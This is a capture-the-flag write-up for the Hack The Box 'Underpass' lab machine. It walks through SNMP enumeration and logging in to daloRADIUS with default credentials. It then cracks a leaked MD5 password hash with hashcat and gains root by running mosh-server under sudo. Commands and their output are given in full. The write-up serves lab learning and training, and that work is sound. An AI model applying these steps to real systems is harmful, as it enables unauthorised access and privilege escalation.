UNDERPASS

• Platform: Hack The Box
• Operating System: GNU/Linux
• Label: Easy
• Writeup By: ReK2 Hispagatos Collective Find us on Matrix Space https://matrix.to/#/hispagatos:matrix.org

USER Flag

Enumeration

• We get started with the typical steps, if do not know this steps we recomend you RTFM and learn systems,programming and networking
• in our Port Scan we find some juicy sh1t with UDP scan considering this is a easy box we can assume an easy path.

pacman -S net-snmp

• Let's run snmpwalk

snmpwalk -c public -v2c underpass.htb
SNMPv2-MIB::sysDescr.0 = STRING: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (256568) 0:42:45.68
SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
SNMPv2-MIB::sysLocation.0 = STRING: Nevada, U.S.A. but not Vegas
SNMPv2-MIB::sysServices.0 = INTEGER: 72
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
SNMPv2-MIB::sysORUpTime.1 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.2 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.3 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.4 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.5 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.6 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.7 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.8 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.9 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.10 = Timeticks: (0) 0:00:00.00
HOST-RESOURCES-MIB::hrSystemUptime.0 = Timeticks: (257805) 0:42:58.05
HOST-RESOURCES-MIB::hrSystemDate.0 = STRING: 2024-12-30,18:53:27.0,+0:0
HOST-RESOURCES-MIB::hrSystemInitialLoadDevice.0 = INTEGER: 393216
HOST-RESOURCES-MIB::hrSystemInitialLoadParameters.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
HOST-RESOURCES-MIB::hrSystemNumUsers.0 = Gauge32: 0
HOST-RESOURCES-MIB::hrSystemProcesses.0 = Gauge32: 217
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = INTEGER: 0
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

• ok we find more interesting things, we duckduckgo search for daloradius
• we find is a software application https://www.daloradius.com/
• let's read the docs for the software, the default install is at folder daloradius since there is no subdomain we try http://underpass.htb/daloradius
• Yes this works... great! let's find more info.
• we get the software version on the login page daloRADIUS 2.2 beta here, I assume you here will do your enumeration as well http://underpass.htb/daloradius/app/operators/login.php
• RTFM https://github.com/lirantal/daloradius
• We find in the docs folder and wiki we find default credentials https://github.com/lirantal/daloradius/wiki/Installing-daloRADIUS

To log in to the RADIUS Management application, use the following default credentials:

Username: administrator
Password: radius

• Is an easy box so yes they do work doh! ;)
• Pocking around we find some juice, the one that turns out to be good for us is in the user manangement part http://underpass.htb/daloradius/app/operators/mng-list-all.php
• we run the kracken hashcat with out the -m option to Auto Defect hash type, even do we know is a php app

hashcat svcMosh-hash  -m 0 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -d 2

• we got it!

412dd4759978acfcc81deab01b382403:underwaterfriends

• is an easy box lets try SSH why not.

ssh svcMosh@underpass.htb
svcMosh@underpass.htb's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Mon Dec 30 07:14:31 PM UTC 2024

  System load:  0.0               Processes:             227
  Usage of /:   92.2% of 3.75GB   Users logged in:       0
  Memory usage: 20%               IPv4 address for eth0: 10.129.100.118
  Swap usage:   0%

  => / is using 92.2% of 3.75GB


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu Dec 12 15:45:42 2024 from 10.10.xx.xx
svcMosh@underpass:~$ whoami
svcMosh
svcMosh@underpass:~$ hostname
underpass

• YAY! get user.txt

ROOT

ok like usuall upload your local enumeration tools...

• hold on this is an easy box so first the standard first steps like check for sudo privs

sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

• ok piece of cake! lets review that program or script

sudo /usr/bin/mosh-server --help
Usage: /usr/bin/mosh-server new [-s] [-v] [-i LOCALADDR] [-p PORT[:PORT2]] [-c COLORS] [-l NAME=VALUE] [-- COMMAND...]

• lets run strings and some binary tools
• After binary review we look for mosh client

svcMosh@underpass:~$ which mosh
/usr/bin/mosh

• ok Steps there are many ways to do this but I think the easiest and simple is :

export TERM=xterm
mosh --server="sudo /usr/bin/mosh-server" localhost # Accept when prompted "Yes"

• and we get root!

root@underpass:~# whoami
root
root@underpass:~# hostname
underpass
root@underpass:~# ls /root/
root.txt

Thanks for reading, remember LEARN do not just copy! if something is new for you RTFM/Research and learn it.

• Happy Hacking
• Another writeup by the ReK2 Hispagatos Collective:
• Find us on Matrix Space: https://matrix.to/#/hispagatos:matrix.org